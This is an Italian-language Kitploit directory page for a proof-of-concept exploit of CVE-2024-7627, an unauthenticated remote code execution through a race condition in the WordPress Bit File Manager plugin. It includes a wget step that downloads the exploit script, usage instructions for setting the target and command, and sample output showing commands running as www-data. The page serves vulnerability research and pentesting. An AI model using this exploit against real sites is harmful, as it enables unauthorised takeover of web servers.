Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2024-7627-PoC — Script Proof-of-Concept per il plugin WordPress Bit File Manager versione 6.0 - 6.5.5 Esecuzione remota di codice non autenticata tramite condizione di competizione (vulnerabilità CVE-2024-7627) | Kitploit
Strumenti/GitHubGitHub/siunam321/cve-2024-7627-poc
Analisi delle VulnerabilitàAnalisi del CodiceExploitSfruttamento di Applicazioni WebSicurezza WebPenetration Testing
GitHubsiunam321/cve-2024-7627-poc

CVE-2024-7627-PoC

Script Proof-of-Concept per il plugin WordPress Bit File Manager versione 6.0 - 6.5.5 Esecuzione remota di codice non autenticata tramite condizione di competizione (vulnerabilità CVE-2024-7627)

Vedi Repository
621 anno faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

CVE-2024-7627-PoC

Contesto

Questo script Proof-of-Concept (PoC) riguarda la vulnerabilità di Esecuzione di Codice Remoto non autenticata tramite race condition (CVE-2024-7627) nel plugin WordPress Bit File Manager versioni 6.0 - 6.5.5.

Informazioni

Descrizione:

Il plugin Bit File Manager per WordPress è vulnerabile all'esecuzione di codice remoto nelle versioni da 6.0 a 6.5.5 tramite la funzione 'checkSyntax'. Ciò è dovuto alla scrittura di un file temporaneo in una directory pubblicamente accessibile prima di eseguire la convalida del file. Ciò rende possibile ad attaccanti non autenticati di eseguire codice sul server se un amministratore ha concesso i permessi di lettura all'utente ospite. (Da https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/file-manager/bit-file-manager-60-655-unauthenticated-remote-code-execution-via-race-condition)

Dettagli tecnici

Analisi: https://siunam321.github.io/ctf/Bug-Bounty/Wordfence/how-i-found-my-first-vulnerabilities-in-6-different-wordpress-plugins-part-2/#flawedmissing-permission-check---bit-file-manager-rce-via-race-condition

Installazione

root@kitploit:~
wget https://raw.githubusercontent.com/siunam321/CVE-2024-7627-PoC/main/poc.py

Utilizzo/Exploit

  • Prerequisito: Indovina l'accesso utente e lo shortcode file-manager deve essere già stato configurato dall'amministratore

Aggiorna i parametri targetBaseUrl, fileManagerPostPath e/o commandToExecute nello script Python poc.py con i valori desiderati. Quindi esegui python3 poc.py per lanciare lo script PoC.

Esempio di output:

root@kitploit:~
└> python3 poc.py
[*] Getting a valid AJAX nonce...
[+] Found the valid AJAX nonce: f3128b289e
[*] Getting a random file's hash via elFinder command "open"...
[+] Found file "wp-config-sample.php" with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA"!
[*] Editing file with hash "l1_d3AtY29uZmlnLXNhbXBsZS5waHA" via elFinder command "put" and getting the edited temporary PHP file at "http://localhost/wp-content/uploads/file-managertemp.php"...
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[-] Failed to read the edited temporary PHP file in time
[+] We won the race condition! Here's the PHP payload result:
www-data
uid=33(www-data) gid=33(www-data) groups=33(www-data)
8d3b2776e8a6
Scarica lo strumento